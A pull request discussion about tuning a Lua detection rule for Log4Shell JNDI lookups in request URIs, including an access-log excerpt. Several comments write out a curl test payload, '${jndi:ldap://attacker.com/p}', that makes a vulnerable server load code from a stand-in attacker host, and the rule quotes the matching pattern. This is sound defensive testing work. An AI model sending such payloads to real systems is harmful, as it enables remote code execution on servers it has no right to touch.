### PR TITLE
Solve multi nested requests

### PR DESCRIPTION
**Pull request by andreasnanko**

### CODE REVIEW

**Comment by igor-mendix** [comment]
Shouldn't it be catching `curl 'https://example.com/${jndi:ldap://attacker.com/p}'` too?

**Comment by Napsty** [comment]
Changing the if condition for the request to the following would work:

```
if string.match(decipher(uri), "{jndi:") or string.match(uri, "jndi:") then
```

**Comment by igor-mendix** [comment]
I can imagine an app that sets something in the header or in URI parameters that ends with this string. For example it may be some kind of generated token that ends with `jndi` with `:` as a delimiter. Even `{jndi:` might break stuff in some rare cases, but `jndi:` has much greater chance.

**Comment by andreasnanko** [comment]
The curl is not valid from my point of view.
curl 'https://example.com/${jndi:ldap://attacker.com/p}' resolves to 'https://example.com/jndi:ldap://attacker.com/p'

Please check the logfile for the request.

**Comment by igor-mendix** [comment]
@andreasnanko You're right, I missed that. Curly braces are indeed stripped.

**Comment by andreasnanko** [comment]
Without the curly bracets it might match random values, like sessions or tokens. That's why i don't like the idea of matching just jndi:

**Comment by Napsty** [comment]
>  curl 'https://example.com/${jndi:ldap://attacker.com/p}' resolves to 'https://example.com/jndi:ldap://attacker.com/p'
Not sure if this is correct. Maybe typo?

`curl 'https://target.example.com/${jndi:ldap://attacker.com/p}'` lands on my webserver and is logged accordingly in the access log:

```
192.168.15.20 - - [14/Dec/2021:13:30:20 +0100] "GET /$jndi:ldap://attacker.com/p HTTP/1.1" 404 281 "-" "curl/7.68.0"
```

So yes, the curly bracket disappears, but the `$` remains.

Besides that, the PR looks good! Thanks a lot!

**Pull request merged**
